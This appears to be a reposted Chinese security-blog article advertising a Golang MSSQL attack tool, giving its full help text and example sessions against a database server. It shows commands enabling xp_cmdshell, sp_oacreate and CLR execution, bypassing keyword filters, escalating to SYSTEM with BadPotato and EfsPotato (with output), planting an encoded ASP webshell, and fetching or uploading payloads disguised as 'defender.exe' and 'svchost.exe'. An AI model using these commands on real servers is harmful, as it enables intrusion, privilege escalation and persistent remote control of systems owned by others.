MSSQL渗透多功能命令利用工具
工具介绍
@Mayter师傅参考以下几个项目用Golang写的一款MSSQL利用工具:xp_cmdshell与sp_oacreate执行命令回显和clr加载程序集执行相应操作,上传,job等相应操作。
https://github.com/Ridter/PySQLToolshttps://github.com/uknowsec/SharpSQLToolshttps://github.com/Ridter/MSSQL_CLRhttps://github.com/JKme/cube/blob/master/core/sqlcmdmodule/mssql3.gohttps://quan9i.top/post/SQL%20Server%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%96%B9%E5%BC%8F%E6%B1%87%E6%80%BB/
参数示例
帮助:
NAME: Mssql Toolkit - mssql command tool USAGE: mssql-command-tools_Windows_64.exe [global options] command [command options] [arguments...] AUTHOR: Microsoft.com clr参考: https://github.com/uknowsec/SharpSQLTools/ COMMANDS: help, h Shows a list of commands or help for one command GLOBAL OPTIONS: --server value, --host value, -s value The database server (default: "127.0.0.1") --user value, -u value The database user (default: "sa") --password value, -p value The database password --database value, -d value The database name (default: "msdb") --port value, -P value The database port (default: 1433) --option value -xcmd, -X powershell (default: "whoami") --query value, -q value, --sql value SQL query (default: "select @@version") --cmd value, -c value, --exec value Exec System Command | xp_cmdshell命令执行 (default: "whoami") --cmd1 value, --c1 value Exec System Command | sp_oacreate无回显执行 (default: "whoami >C:\\whoami.log") --cmd2 value, --c2 value Exec System Command | sp_oacreate有回显执行 | wscript.shell (default: "whoami") --cmdsp value Exec System Command | sp_oacreate有回显执行 | {72C24DD5-D70A-438B-8A42-98424B88AFB8} (default: "whoami") --cmd3 value, --c3 value Exec System Command | clr执行 | clr命令参考: https://github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami") --cmdpy value Exec System Command | clr执行 | clr命令参考: https://github.com/Ridter/PySQLTools (default: "clr_exec whoami") --cmd4 value, --c4 value Exec System Command | 自写clr执行 (default: "-c4 net -c5 user") --cmd5 value, --c5 value Exec System Command | 自写clr执行 (default: "-c4 net -c5 user") --cmd6 value, --c6 value Exec System Command | xp_cmdshell命令执行|过滤了xp_cmdshell等关键字提交方法语句 (default: "-c6 whoami") --cmd7 value, --c7 value Exec System Command | 自写clr执行 (default: "-c7 whoami") --cmd8 value, --c8 value Exec System Command | r language command (default: "-c8 whoami") --cmd9 value, --c9 value Exec System Command | python language command (default: "-c9 whoami") --cmd10 value, --c10 value Exec System Command | createAndStartJob command (default: "-c10 whoami >c:\\windows\\temp\\123.txt") --cmd11 value, --c11 value Exec System Command | 自写clr执行 | --option -x --cmd11 cmd | --option -X --cmd11 powershell (default: "--option -x --cmd11 cmd") --dir value, --dirtree value xp_dirtree列目录 | dir c: --path value 网站路径 -path + -code | c:\inetpub\wwwroot\cmd.asp (default: "c:\\inetpub\\wwwroot\\cmd.asp") --local value 本地路径 localFile (default: "c:\\1.txt") --remote value 远程路径 remoteFile (default: "C:\\Windows\\Temp\\1.txt") --code value -path + -code | 如果代码有"就加\来匹配<%eval request("cmd")%>网站路径和asp密码默认:LandGrey (default: "<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>") --downurl value 下载文件的url地址 | http://www.microsoft.com/defender.exe --filepath value 下载文件的路径 | c:\programdata\svchost.exe --debug Debug info --enable, -e Enabled xp_cmdshell --disable, --diclose Disable xp_cmdshell --ole, --oleopen Enabled sp_oacreate --dole, --dolose Disable sp_oacreate --clr, --clropen Enabled clr enabled --dclr, --dclose Disable clr enabled --rlce, --rlceopen r|python languag eenabled --jobopen MSSQL Agent Job服务开启 --install_clr, --in_clr install clr | --cmd3 "clr_exec whoami" | clr命令参考: https://github.com/uknowsec/SharpSQLTools/ --uninstall_clr, --un_clr uninstall clr | --cmd3 "clr_exec whoami" --installpy_clr, --inpy_clr installpy clr | --cmdpy "clr_exec whoami" | clr命令参考: https://github.com/Ridter/PySQLTools --uninstallpy_clr, --unpy_clr uninstallpy clr | --cmdpy "clr_exec whoami" --install_clrcmd, --in_clrcmd install clrcmd | "--c4 net --c5 user" --uninstall_clrcmd, --un_clrcmd uninstall clrcmd | "--c4 net --c5 user" --install_clrcmd1, --in_clrcmd1 install clrcmd1 | --cmd7 "whoami" --uninstall_clrcmd1, --un_clrcmd1 uninstall clrcmd | --cmd7 "whoami" --install_clrcmd2, --in_clrcmd2 install clrcmd2 | --cmd11 "whoami" --uninstall_clrcmd2, --un_clrcmd2 uninstall clrcmd2 | --cmd11 "whoami" --upload --upload --local c:\svchost.exe --remote C:\Windows\Temp\svchost.exe --help, -h show help
示例:
开启xp_cmdshell组件mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --enable/--e 开启sp_oacreate组件mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --ole/--o 开启ole组件mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin -clr xp_cmdshell 执行mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd "whoami"nt service\mssqlserver 绕过过滤xp_cmdshell关键字mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd6 "whoami"nt service\mssqlserver sp_oacreate 执行 略微不一样,但大致一样mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd2 "whoami" nt service\mssqlserver mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdsp "whoami" nt service\mssqlserver 安装SharpSQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --install_clrClrcmd Install SharpSQLTools CLR Success. 执行命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_exec whoami"mssql: [+] Process: cmd.exemssql: [+] arguments: /c whoamimssql: [+] RunCommand: cmd.exe /c whoamimssql:mssql: nt service\mssqlserver 提权mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_badpotato whoami" mssql: [*] CreateNamedPipeW Success! IntPtr:4048mssql: [*] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:1816351484896mssql: [*] ConnectNamePipe Success!mssql: [*] CurrentUserName : MSSQLSERVERmssql: [*] CurrentConnectPipeUserName : SYSTEMmssql: [*] ImpersonateNamedPipeClient Success!mssql: [*] OpenThreadToken Success! IntPtr:6840mssql: [*] DuplicateTokenEx Success! IntPtr:6556mssql: [*] SetThreadToken Success!mssql: [*] CreateOutReadPipe Success! out_read:5536 out_write:5528mssql: [*] CreateErrReadPipe Success! err_read:3436 err_write:5072mssql: [*] CreateProcessWithTokenW Success! ProcessPid:9608mssql: nt authority\system卸载SharpSQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstall_clrUninstall SharpSQLTools CLR Success. 安装PySQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --installpy_clrClrcmd Install PySQLTools Clr Success. 执行命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdpy "clr_exec whoami" mssql: [+] Successfully unhooked ETW!mssql: [*] No dll to patchmssql: [+] Process: cmd.exemssql: [+] arguments: /c whoamimssql: [+] RunCommand: cmd.exe /c whoamimssql: mssql: nt service\mssqlserver 提权 卸载PySQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstallpy_clrUninstall PySQLTools Clr Success. mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd4 net -cmd5 user\\ 的用户帐户 -------------------------------------------------------------------------------Administrator DefaultAccount GuestWDAGUtilityAccount命令运行完毕,但发生一个或多个错误。 mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd7 "whoami" mssql: Command is running, please wait.mssql: nt service\mssqlserver mssql: nt service\mssqlserver r language command (default: "-c8 whoami")mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd8 "whoami" nt service\mssqllaunchpad python language command (default: "-c9 whoami")mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd9 "whoami"nt service\mssqllaunchpad 执行CreateAndStartJobmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd10 "whoami >c:\\programdata\\test.txt"CreateAndStartJob Command Success! 当权限不足的时候mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_efspotato net start SQLSERVERAGENT" 列目录mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\\programdata"subdirectory depth file123.dllApplication DataDocumentsHuorongMicrosoftMSSQLSERVERPackage Cacheregid.1991-06.com.microsoftSoftwareDistributionSSISTelemetryTemplatestest.txtUSOPrivateUSOSharedVMware「开始」菜单桌面 Command List Dir Success. -x cmd命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -x --cmd11 "whoami"[]nt service\mssqlserver -X powershell命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -X --cmd11 "Get-Process explorer"[] Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName------- ------ ----- ----- ------ -- -- ----------- 2296 113 71352 183772 1304 1 explorer 上传文件mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --upload --local c:\Database.dll --remote C:\programdata\Database.dll [*] Uploading 'c:\Database.dll' to 'C:\programdata\Database.dll'...[!] C:\programdata\Database.dll Upload Success mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\\programdata"subdirectory depth file123.dllApplication DataDatabase.dll
下载地址:
https://github.com/Mayter/mssql-command-tool
文章来源:Hack分享吧
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
官方
5.57K篇文章
177.62M总阅读量
